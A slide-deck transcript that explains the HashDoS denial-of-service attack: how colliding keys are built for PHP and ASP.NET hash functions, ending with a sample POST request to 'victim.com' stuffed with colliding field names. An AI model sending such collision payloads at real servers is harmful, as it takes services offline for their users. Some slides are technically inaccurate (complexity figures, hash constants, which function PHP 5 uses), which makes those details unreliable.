Layer-7 DoS Hash Collisions - PowerPoint PPT Presentation
Presentation Transcript
slide1
Layer-7 DoS

Hash Collisions

slide2

About Hybrid Security

  • Provide cyber fraud protection to websites
  • Prevent business logic attacks on web applications
  • Heuristic web user behavior analysis
  • Signature-free 0-day attack detection
slide3

Layer-7 DoS

  • Slowloris: Written by RSnake, exploits slow HTTP headers
  • R.U.Dead.Yet: Written by Raviv Raz, exploits slow POST fields
  • Keep-Dead: Written by Esrun, exploits long Keep-Alive sessions

slide4

Hash DoS

  • HashDoS – Advisory published by Julian Wälde & Alexander Klink, Dec. 28, 2011
  • Vulnerability in ASP.NET (MS11-100)
  • Vulnerability in PHP 4 and 5
  • Also vulnerable: Java, Tomcat, Python, Ruby, Oracle

slide5

Hash Tables

[Figure: the keys login=root and passwd=123 are passed through the hash key and land in separate table nodes]

Insert, search, delete node with O(n) complexity

slide6

Hash Collisions

[Figure: the keys EzEz=123, EzFY=123 and FYEz=123 are passed through the hash key and all land in the same node]

When h(Ez) = h(FY)…

Insert, search, delete node become O(n²) complexity

slide7
DJBX33A Hashing
  • Daniel J. Bernstein, 33 additions
  • Used in 32 bit PHP 5, Java Tomcat
  • Similar function used in Ruby
slide8
Hashing With the Pigeons
  • Apparently, a non-injective function
  • More commonly known as the pigeonhole principle

[Figure: many strings mapped onto fewer hashes]

slide9
DJBX33X Hashing
  • Daniel J. Bernstein, 33 XORs
  • Used in 32/64 bit PHP 4 & ASP.NET
  • Similar function used in Python
slide10
Linear Collision Generation

h('Ey')  = 31¹ · 69 + 31⁰ · 121 = 2260
h('FZ')  = 31¹ · 70 + 31⁰ · 90  = 2260

h('Eya') = 31 · (31¹ · 69 + 31⁰ · 121) + 31⁰ · 97
         = 31 · (31¹ · 70 + 31⁰ · 90)  + 31⁰ · 97
         = h('FZa')

slide12
Using Binary Permutations

h('EzEz')    (00)
= h('EzFY')  (01)
= h('FYEz')  (10)
= h('FYFY')  (11)

slide13
Pre-computing rainbow tables
  • Calculate long permutations of colliding char pairs
  • Create many same-hash field names for POST
  • More advanced Meet-In-The-Middle techniques improve rainbow table creation exponentially
slide14
PHP 5
  • DJBX33X
  • 1 Gbit speed keeps ~ 10,000 i7 core CPU busy
  • POST limited by 8 MB
  • POST limited by max_input_time (default on Ubuntu/BSD = 60 seconds)
slide15

<?php echo $_POST["param"]; ?>

slide16

DJBX33X

  • Breakable using Meet-In-The-Middle
  • 30 kbits/sec keeps 1 core-2 CPU busy
  • With 1 Gbit keeps ~ 30,000 core-2 CPU busy
slide17

<% Response.Write(Request.Form["param"]); %>

slide18

POST http://victim.com/
Host: victim.com
Connection: keep-alive
Content-Length: 1000000
User-Agent: Mozilla/5.0
Cookie: __utmz=181569312.1294666144.1.1

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&
EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…

slide20
Thank You

raviv@hybridsec.com

http://www.hybridsec.com